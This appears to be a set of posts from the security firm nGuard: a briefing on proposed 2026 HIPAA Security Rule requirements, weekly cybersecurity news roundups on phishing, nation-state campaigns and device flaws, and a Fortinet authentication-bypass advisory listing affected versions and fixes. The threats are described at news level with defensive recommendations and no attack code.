Multi-Factor Authentication

HIPAA SECURITY RULE: MANDATORY 2026 UPDATES

nGuard | HIPAA Security Rule 2026 Mandates

Technical Briefing

HIPAA SECURITY RULE:
MANDATORY 2026 UPDATES

The HHS Unified Agenda targets May 2026 for final action. Effective date occurs 60 days post publication; compliance is mandatory 180 days thereafter.

The Removal of Choice: Addressable vs Required

Implementation flexibility is abolished. The proposed rule transitions all implementation specifications to mandatory status. Organizations can no longer bypass controls based on internal risk tolerance or perceived irrelevance.

Legacy Framework

Addressable Flexibility

Compensating controls permitted
Risk-based implementation options
Subjective interpretation allowed

2026 Mandate

Prescriptive Enforcement

100% Mandatory Implementation
No compensating controls permitted
Limited exceptions for technical impossibility

Mandatory Technical Safeguards

The following technical controls are required for all covered entities regardless of operational size or infrastructure complexity.

Encryption & MFA

Encryption of ePHI at rest and in transit across databases, file systems, endpoints, and networks.
MFA required for all authenticated access to systems housing ePHI.

Continuous Testing

Vulnerability Scans: Mandatory performance every 6 months.
Penetration Tests: Mandatory full testing every 12 months.

Network Security

Network Segmentation: Required to limit lateral threat movement.
Secure Configuration: Mandatory removal of unused ports and software.

Data Resilience

Explicit technical controls for backup and recovery testing.
72-Hour recovery objective for all critical data systems.

Response & Notification Windows

24h

Access Changes

Notify appropriate parties within 24 hours of workforce access modification or termination.

72h

System Recovery

Restore critical data and systems within 72 hours of contingency plan activation.

24h

BA Activation

Business Associates must notify Covered Entities within 24 hours of contingency plan activation.

Administrative Safeguards

Asset Inventories

Network maps and hardware/software inventories must undergo a formal annual review.

Risk Analysis

Risk assessments must explicitly document inventory, threats, and specific vulnerability levels.

Annual Audit

A formal Security Rule Compliance Audit is now a mandatory annual requirement (every 12 months).

Criticality Analysis

Organizations are now required to maintain a formal criticality analysis. This documentation must prioritize systems for restoration to support the 72 hour recovery objective.

Required Documentation Pillars

IR Plans

Testing Proof

Effectiveness Reviews

Workforce Reporting

Strengthened Vendor Management

Workforce Coordination

Specific workflows must ensure appropriate parties receive notification within 24 hours of access modification. This eliminates the risk of orphan accounts remaining in third party or internal systems.

BA Verification

Annual written verification of required technical safeguards from all Business Associates is now mandatory. Organizations must actively verify vendor compliance rather than passively assuming it.

This Week in Cybersecurity (TWiC): Medical Devices, Phishing, and Espionage

Welcome to this week’s cybersecurity advisory, where we expose the most pressing cyber threats targeting industries worldwide. This edition uncovers major vulnerabilities in medical monitors, a new wave of Microsoft 365 phishing attacks, North Korean cyber espionage tactics, and the hijacking of Signal accounts through malicious QR codes. Here’s what you need to know:

Medical Monitors Contain Embedded Security Risks

The Cybersecurity and Infrastructure Security Agency (CISA) and the U.S. Food and Drug Administration (FDA) recently issued an alert regarding Contec CMS8000 and Epsimed MN-120 patient monitors. The devices, which track vital signs such as heart rate and oxygen saturation, were initially thought to contain a hidden backdoor. However, cybersecurity researchers have since determined that the issue stems from insecure design rather than intentional malware.

Risks Identified:

Unauthorized remote access and control of the device.
Potential lateral movement within hospital networks.
Possible exfiltration of patient health information (PHI).

Security Recommendations:

Healthcare providers should assess whether affected monitors are in use.
Network segmentation should be enforced to isolate these devices from critical systems.
Monitoring and patching processes must be implemented to detect and mitigate exploitation attempts.

Russian Threat Actors Exploit Microsoft 365 with Device Code Phishing

Security researchers from Volexity and Microsoft warn that Russian-backed cyber actors are targeting Microsoft 365 accounts using a technique called device code phishing. This method manipulates the OAuth authentication process designed for input-constrained devices like smart TVs and printers.

Attackers masquerade as trusted entities, such as the U.S. Department of State or the Ukrainian Ministry of Defense, to lure victims into entering an authentication code on a phishing page. Once completed, the attackers gain persistent access to the victim’s Microsoft 365 account.

Mitigation Measures:

Organizations should monitor unusual device authentication requests.
Employees should be trained to recognize suspicious login requests.
Microsoft 365 tenants should enforce Conditional Access policies and Multi-Factor Authentication (MFA) and have such mechanisms evaluated by experts.

North Korean APT Exploits PowerShell and Dropbox for Cyber Espionage

Researchers have uncovered a sophisticated cyber espionage operation, DEEP#DRIVE, orchestrated by North Korea’s Kimsuky group (APT43). The campaign targets South Korean government agencies, businesses, and cryptocurrency users using phishing emails that deploy malicious PowerShell scripts via Dropbox.

Threat Tactics:

Malicious Windows shortcut (.LNK) files initiate payload execution.
PowerShell scripts retrieve additional malware from Dropbox.
A scheduled task maintains persistence and exfiltrates sensitive data.

Defensive Actions:

Organizations should restrict PowerShell script execution and implement application control policies.
Cloud storage access should be monitored for unauthorized API activity.
Security awareness training must emphasize phishing lures disguised as document files.

Russian Hackers Exploit Signal’s Linked Device Feature Using QR Codes

Russia-aligned cyber actors have been actively targeting Signal users through malicious QR codes, enabling them to covertly eavesdrop on encrypted communications. Google’s Threat Intelligence Group (GTIG) discovered that these attackers use phishing techniques to trick victims into scanning fraudulent QR codes, unknowingly linking their Signal accounts to adversary-controlled devices.

Key Findings:

Attackers disguise QR codes as legitimate Signal group invites.
Messages are intercepted in real-time, compromising private conversations.
Some campaigns use phishing pages mimicking military applications to deceive Ukrainian personnel.

Protective Measures:

Signal users should verify device-linking prompts before scanning QR codes.
Organizations should seek out employee training and social engineering efforts to test employee awareness.
Users should regularly review and unlink unrecognized devices from their accounts.

Conclusion

This week’s headlines emphasize the continued risk posed by both nation-state and financially motivated actors targeting critical infrastructure, enterprise environments, and personal communication tools. Organizations must adopt a proactive defense strategy, combining network segmentation, endpoint monitoring, phishing awareness, and access control measures to reduce evolving cyber risks.

Stay vigilant, stay secure, and follow nGuard on LinkedIn to stay on top of the latest cyber updates and insights.

TWiC | Fortinet PoC, US Airport Sites Go Offline, CISA Warns of Industrial Appliance Flaws, & Windows 11 Phishing Protection

Over the past few weeks there have been several hot topics and time sensitive advisories released. In this edition of This Week in Cybersecurity, nGuard will highlight the Fortinet proof-of-concept (PoC) that was released; Russian-speaking hackers taking down US Airport websites; Windows 11 offering automatic phishing protection; and CISA warning of critical flaws in some industrial appliances.

Fortinet PoC Released
A proof-of-concept (PoC) exploit code has been made available for the recently disclosed critical security flaw affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager. A successful exploitation of the shortcoming is tantamount to granting complete access “to do just about anything” on the affected system. Fortinet issued an advisory urging customers to upgrade affected appliances to the latest version as soon as possible and CISA added this to their Known Exploited Vulnerabilities (KEV) Catalog. 12 unique IP addresses have accounted for most responsibility in weaponizing CVE-2022-40684 as of October 13, 2022. A majority of them are located in Germany, followed by the U.S., Brazil, China and France. nGuard covered this in more detail in a Security Advisory last week. Conducting ongoing penetration testing and vulnerability management can alert you to these types of vulnerabilities being present in your environment.

US Airport Sites Taken Down by Russian-Speaking Attackers
On Monday October 10^th, more than a dozen public-facing airport websites, including those for some of the nation’s largest airports, appeared inaccessible, and Russian-speaking hackers claimed responsibility. The attack was carried out by a group known as Killnet, who support the Kremlin but are not thought to be government hackers. Killnet favors a type of attack known as a distributed denial of service (DDoS). Two of the sites that were affected by this attack were Atlanta’s Hartsfield-Jackson International Airport and the Los Angeles International Airport websites. Fortunately, there did not seem to be an impact to air travel itself but may have caused inconveniences for individuals traveling during the time access to those sites was attempted.

Windows 11 Offers Automatic Phishing Protection
Enhanced phishing protection now comes prebuilt into the Windows 11 operating system. This protection can automatically detect when users type their password into any app or site that is known to be dangerous. Admins can know exactly when a password has been stolen and can be equipped to better protect against such attacks. According to Microsoft, “When Windows 11 protects against one phishing attack, that threat intelligence cascades to protect other Windows users interacting with other apps and sites that are experiencing the same attack.” A blocking dialog warning is displayed prompting users to change their password if they type it into a phishing site in any Chromium browser or into an application connecting to a phishing site. If users try to store their password locally, like in Notepad or in any Microsoft 365 app, Windows 11 warns them that this is an unsafe practice and urges them to delete it from the file. To help train and test your employees on their security awareness, nGuard offers custom, tailored Security Awareness Training and social engineering.

CISA Publishes Two Advisories Regarding Industrial Appliances
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published two Industrial Control Systems advisories pertaining to severe flaws in Advantech R-SeeNet and Hitachi Energy APM Edge appliances. The list of issues, which affect R-SeeNet Versions 2.4.17 and prior are:

CVE-2022-3385 and CVE-2022-3386 (CVSS scores: 9.8) – Two stack-based buffer overflow flaws that could lead to remote code execution
CVE-2022-3387 (CVSS score: 6.5) – A path traversal flaw that could enable a remote attacker to delete arbitrary PDF files

Patches have been made available in version R-SeeNet version 2.4.21 released on September 30, 2022.

These alerts come less than a week after CISA published 25 ICS a d visories on October 13, 2022, spanning several vulnerabilities across devices from Siemens, Hitachi Energy, and Mitsubishi Electric.

nGuard has a wide array of experience assessing critical infrastructure, SCADA, and Industrial Control Systems (ICS) and can help you secure yours. Conducting annual penetration testing, having a proper Incident Response Plan, and ensuring you have the proper logging, alerting, and correlation can help you stay ahead of the attackers.

URGENT | Fortinet Authentication Bypass Vulnerability

On October 10, 2022, Fortinet, Inc released a new advisory for CVE-2022-40684 which affects the FortiOS, FortiProxy and FortiSwitchManager products.

Each of these products are vulnerable to an authentication bypass vulnerability. This vulnerability could allow an attacker to perform unauthenticated actions on the target system. These actions include, but are not limited to:

Modifying admin user SSH keys.
Adding new local users
Updating network configurations to reroute traffic
Initiating packet captures to capture sensitive information

Publicly available exploit code is now starting to become available.

Affected Products

FortiOS version 7.2.0 through 7.2.1
FortiOS version 7.0.0 through 7.0.6
FortiProxy version 7.2.0
FortiProxy version 7.0.0 through 7.0.6
FortiSwitchManager version 7.2.0
FortiSwitchManager version 7.0.0

Solutions

Upgrade to FortiOS version 7.2.2 or above
Upgrade to FortiOS version 7.0.7 or above
Upgrade to FortiProxy version 7.2.1 or above
Upgrade to FortiProxy version 7.0.7 or above
Upgrade to FortiSwitchManager version 7.2.1 or above

Read more in:

www.fortiguard.com: FortiOS / FortiProxy / FortiSwitchManager – Authentication bypass on administrative interface
docs.fortinet.com: FortiOS Release Notes for FortiOS 7.2.2 build 1255
www.darkreading.com: Patch Now: Fortinet FortiGate & FortiProxy Contain Critical Vuln
www.bleepingcomputer.com: Fortinet says critical auth bypass bug is exploited in attacks

Ongoing penetration testing and vulnerability management can alert you to these types of vulnerabilities being present in your environment. nGuard account executives are standing by to discuss solutions that elevate the overall security posture of your organization and ensure you are ready to handle vulnerabilities such as the ones described above.

TWiC | This Week in Cybersecurity – Let’s Go Phishing 🎣

Over the past week there have been many hot topics in cybersecurity. This edition of This Week in Cybersecurity includes stories focused on the latest in phishing campaigns tactics, techniques, procedures, common use cases, and infrastructure being used. Check out the details below.

Phishing Attacks Skyrocket with Microsoft and Facebook as Most Abused Brands

The number of phishing attempts that misuse the Microsoft brand jumped 266 percent in the first quarter of 2022 compared to the same period last year, according to a report by researchers at Vade. In the same period of time, fake Facebook messages increased by 177% in the second quarter of 2022. In Q1 2022 compared to the previous year, there were 266 percent more instances of phishing assaults using the Microsoft name. As opposed to the previous year, hackers are ramping up their use of false messages that abuse well-known companies, bringing back the bloom of phishing attempts. According to the phishing research Microsoft, Facebook, and the French bank Crédit Agricole are the three most frequently impersonated companies in attacks. Crédit Agricole, WhatsApp, and the French telecommunications provider Orange are some of the other top names that are misused in phishing attempts. Other well-known brands included Apple, Google, and PayPal.
DUCKTAIL Malware Targeting HR Professionals Through LinkedIn Spear-phishing Campaign

Cybersecurity research has recently learned of an ongoing operation known as DUCKTAIL. This strategy aims to gain control of a company’s Facebook business account that handle its advertising. DUCKTAIL uses a malware component that steals information to hack Facebook Business accounts. This sets DUCKTAIL apart from other malware campaigns that used Facebook as a base of operations in the past. The malware is able to access the victim’s Facebook account by stealing cookies from the victim’s browser and utilizing authentication cookies during authenticated Facebook sessions. This has allowed hackers to access every Facebook Business account that the victim has access to, even ones with restricted access. DUCKTAIL has been using LinkedIn to identify potential targets for these campaigns.
1,000s of Phishing Attacks Blast Off from InterPlanetary File System

The InterPlanetary File System (IPFS), a distributed peer-to-peer file system, has become a hotbed of phishing-site storage. Thousands of emails containing phishing URLs are showing up in corporate inboxes. IPFS uses peer-to-peer (P2P) connections for file and service-sharing instead of a static resource demarked by a host and path. Phishers may start using even more sophisticated methods for replicating sites, such as using distributed hash tables. According to an anti-phishing expert, security admins need to educate themselves and their staff about how IPFS works.
Evilnum APT Hackers Group Attack Windows Using Weaponized Word Documents

The APT threat actor, Evilnum, has been targeting European banking and investment organizations. Recently their tactics, techniques, and procedures have included spear-phishing emails with attachments like Microsoft Word, ISO, and Windows Shortcut (LNK) files. Researchers discovered other variations of the campaign in late 2022, including ones that employed financial bribes to get victims to open malicious ZIP folders that were coupled with malicious .LNK files. In the middle of 2022, the methodology that was being used to distribute Word documents was altered once more to incorporate a mechanism that tries to connect to an attacker-controlled domain and obtain a remote template.

Stop Phishing
nGuard has been conducting social engineering assessments for almost 2 decades and has the experience and expertise to assess your users against phishing campaigns using a variety of attack methods. Using emails, phone calls, text messages, multi-factor prompt bombing attacks, fake websites, and more, nGuard can thoroughly test your security awareness training program efficacy. Contact your Account Executive or Security Consultant to learn more about how nGuard can help.

TWiC | This Week in Cybersecurity

Over the past week there have been many hot topics in cybersecurity. This edition of This Week in Cybersecurity includes stories covering Microsoft rolling back their decision to not block Office macros by default, phishing campaigns successfully bypassing multi-factor authentication (MFA), a former CIA engineer responsible for the “Vault 7 Leaks” was convicted, hackers targeting industrial control systems, and much more. Check out the details below.

Microsoft Rolls Back Decision To Block Office Macros By Default

While Microsoft announced earlier this year that it would block VBA macros on downloaded documents by default, Redmond said that it will roll back this change based on “Feedback” until further notice. Microsoft’s customers were the first to notice that Microsoft rolled back this change in the Current Channel, with the old ‘Enable Editing’ or ‘Enable Content’ buttons shown at the top of downloaded Office documents with embedded macros. While Microsoft has not shared the negative feedback that led to the rollback of this change, users have reported that they are unable to find the Unblock button to remove the Mark-of-the-Web from downloaded files, making it impossible to enable macros.
Large-Scale Phishing Campaign Bypasses MFA

Attackers are getting wise to organizations’ increasing use of MFA to better secure user accounts and creating more sophisticated phishing attacks like these that can bypass it, noted a security professional. “While MFA is certainly valuable and should be used when possible, by capturing the password and session cookie – and because the session cookie shows that MFA was already used to login – the attackers can often circumvent the need for MFA when they login to the account again later using the stolen password,” observed Erich Kron from KnowB4. This attack is especially convenient for threat actors because it precludes the need for them to craft their own phishing sites such as the ones used in conventional phishing campaigns, researchers noted. In the phishing campaign observed by Microsoft researchers, attackers initiate contact with potential victims by sending emails with an HTML file attachment to multiple recipients in different organizations. One of nGuard’s most common assessments is Social Engineering. During these assessments our engineers come across applications that require MFA and attempt to bypass the requirement using these techniques and others like MFA Prompt Bombing.
Jury convicts ex-CIA engineer for leaking the agency’s “Vault7” hacking toolset

Joshua Schulte, the former CIA engineer arrested for what’s being called the biggest theft of classified information in the agency’s history, has been convicted by a federal jury. Schulte was arrested in relation to the large cache of documents that Wikileaks had published throughout 2017. That string of CIA leaks known as “Vault 7” contained information on the tools and techniques the agency used to hack into iPhones and Android phones for overseas spying. It also had details on how the CIA broke into computers and how it turned smart TVs into listening devices. A federal jury has found Schulte guilty on nine counts, including illegally gathering national defense information and then transmitting it. As part of his closing arguments, he told the jurors that the CIA and the FBI made him a scapegoat for their embarrassing failure, repeating what his side had been saying from the time he was arrested.
State-backed hackers targeted US-based journalists in widespread spy campaigns

State-sponsored hackers from China, North Korea, Iran and Turkey have been regularly spying on and impersonating journalists from various media outlets in an effort to infiltrate their networks and gain access to sensitive information, according to a report released by cybersecurity firm Proofpoint. In one of the operations, the report found that since early 2021, Chinese-backed hackers engaged in numerous phishing attacks mainly targeting U.S.-based journalists covering U.S. politics and national security. The researchers concluded their report with a warning to journalists to protect themselves and their sources because these types of attacks are likely to persist as state-sponsored hackers attempt to gather more sensitive information and manipulate public perception.
Hackers are targeting industrial systems with new strain of malware

People hawking password-cracking software are targeting the hardware used in industrial-control facilities with malicious code that makes their systems part of a botnet, a researcher reported. Lost passwords happen in many organizations. A programmable logic controller — used to automate processes inside factories, electric plants, and other industrial settings, for example, may be set up and largely forgotten over the following years. When a replacement engineer later identifies a problem affecting the PLC, they may discover the now long-gone original engineer never left the passcode behind before departing the company. An entire ecosystem of malware attempts can capitalize on scenarios like this one inside industrial facilities. Online advertisements promote password crackers for PLCs and human-machine interfaces, which are the workhorses inside these environments. nGuard has a wide range of experience securing Critical Infrastructure, SCADA systems, and Industrial Controls Systems for the manufacturing industry. Our penetration testing and compliance assessments can give you the confidence in the security posture of these environments.